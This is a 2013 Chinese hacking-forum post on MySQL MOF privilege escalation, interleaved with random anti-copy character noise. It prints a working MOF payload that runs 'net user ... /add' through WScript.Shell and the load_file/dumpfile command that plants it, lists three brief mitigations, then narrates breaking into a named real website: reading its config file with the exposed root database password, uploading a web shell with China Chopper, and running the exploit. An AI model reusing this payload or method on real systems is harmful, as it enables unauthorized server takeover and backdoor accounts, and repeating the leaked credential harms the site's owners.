中国网络渗透测试联盟
标题:
Mysql mof扩展漏洞实例与防范
[打印本页]
作者:
admin
时间:
2013-1-4 19:49
标题:
Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
& E1 p8 N3 U* T3 Q3 B. @
& x; P" ?! T$ C
网上公开的一些利用代码:
: X- {+ F2 J& V% j5 ~
, r* }. {- ^( L. K
#pragma namespace(“\\\\.\\root\\subscription”)
: I' B2 G! S% l" P V2 h h% v& _# X
3 o5 n) o9 }# \/ t' K: w
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
/ D0 ]( `# w7 A
3 w! P5 C* M; v; H) B0 n$ ?
. z6 i8 A T& f+ D1 Y s
4 Y6 o- b ?8 u. b( N6 O9 J+ O
+ U" h" f3 x- U# Z" Z# s6 v1 c
3 H2 }/ k- \6 {- N- P
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
8 d. E2 b8 y7 J" K/ o0 q
从上面代码来看得出解决办法:
2 L$ t d* \! ^9 h4 E1 ]3 B
' r8 Q0 ^; C4 k: t; |' |( w3 R
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
& v# q% ^0 ~0 b# @" x2 ^( b' x
4 H f9 c0 S# I: A% N2 J
2、禁止使用”WScript.Shel”组件
. r( O. ~/ f# x6 }
* Q$ u6 S+ V( c/ M, H0 t( G
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
. i* k/ ?9 z* a4 x1 Y x* e: h2 @
* n) R6 |# Y# }. e* q
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
0 T: R4 j; T, X
( A2 x* T- E0 x7 F* Q
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
0 G5 x8 q8 A5 J! K
: i! B" K- g' r2 |
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
- s( W) B6 V' g3 L+ p
1 L& G! X( u0 Y2 ]% d4 ^# Z$ |
看懂了后就开始练手吧
- v/ r5 @+ `# P6 |# f
8 Q* K8 e" K$ ]7 i2 b
http://www.webbmw.com/config/config_ucenter.php
一句话 a
2 }7 R9 }: o% k/ B6 j. L
0 X( n" L% [1 W6 J) S
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
% X5 d2 g. X4 W$ F9 Z
* U8 n! j" u3 d3 C
于是直接用菜刀开搞
5 B; y( }1 w* P" M9 A
/ v P' W! F! A7 F3 g
上马先
. h4 g, ?. R6 J0 p9 |! @
8 \3 F$ E: v+ O! [: g
既然有了那些账号 之类的 于是我们就执行吧…….
- }* ~! S N0 z2 ]6 M
# V, u: E9 w. ] k* ~$ Z
小小的说下
$ w2 o9 @ d% p+ _/ B8 x
4 u4 E( y/ _& a8 t0 _. c
在这里第1次执行未成功 原因未知
7 k) w) c3 h" \/ D- o
6 }5 Y& b3 E4 W0 `; E7 f* {
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
% A8 y5 g( f: y! c" D: q
4 h& }: c+ F$ R; ]# v( M% N2 V
#pragma namespace(“\\\\.\\root\\subscription”)
$ P/ r3 H5 U" }, [* e
- k; F) Z! q/ w* C+ k' Y6 \
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
1 \; b: X3 B) K, s5 w) Q( n
/ {: j6 [/ d2 s+ I6 \4 O, m
我是将文件放到C:\WINDOWS\temp\1.mof
' J- b3 B4 x$ z
% a: h8 t, x3 U% V: G0 }3 U
所以我们就改下执行的代码
, ~3 I! g3 o6 r+ l4 c
8 A Q9 ?2 R7 _' H7 K: t& q4 [
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
9 n! G, N4 s3 p Z/ P g( J
. ^7 z; p& Y& \
& Q$ B4 J0 Y+ S3 q) y
. C+ Q5 v; _$ s- N, u" g
但是 你会发现账号还是没有躺在那里。。
' z& [% ^9 K) ]( H/ G% I
8 J& c5 K( l7 Q" C+ h7 ]
于是我就感觉蛋疼
) ]- ^* n7 _& @/ Q# n! s, u5 D
' U# p W$ h) B) e+ d
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
9 I0 U0 t7 ]0 T9 L/ P9 U9 `
# O$ H# ^4 O7 K; M; N( j& Y8 ` }
6 @" j ?! l! Z+ C7 E- b3 a; E( F0 x
* [6 c# t: }9 F" r* J: W' [& H
但是其他库均不成功…
J' C& \ I( ^" z4 K+ d" c5 F5 B
$ K7 f9 o, r% i6 P1 K* L
我就很费解呀 到底为什么不成功求大牛解答…
+ b7 D" N" t) Z
9 ` ~, I3 y5 K& H. u* v
1 U# l% f0 Q' l: m+ v
# y0 i/ b6 G0 T+ A
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2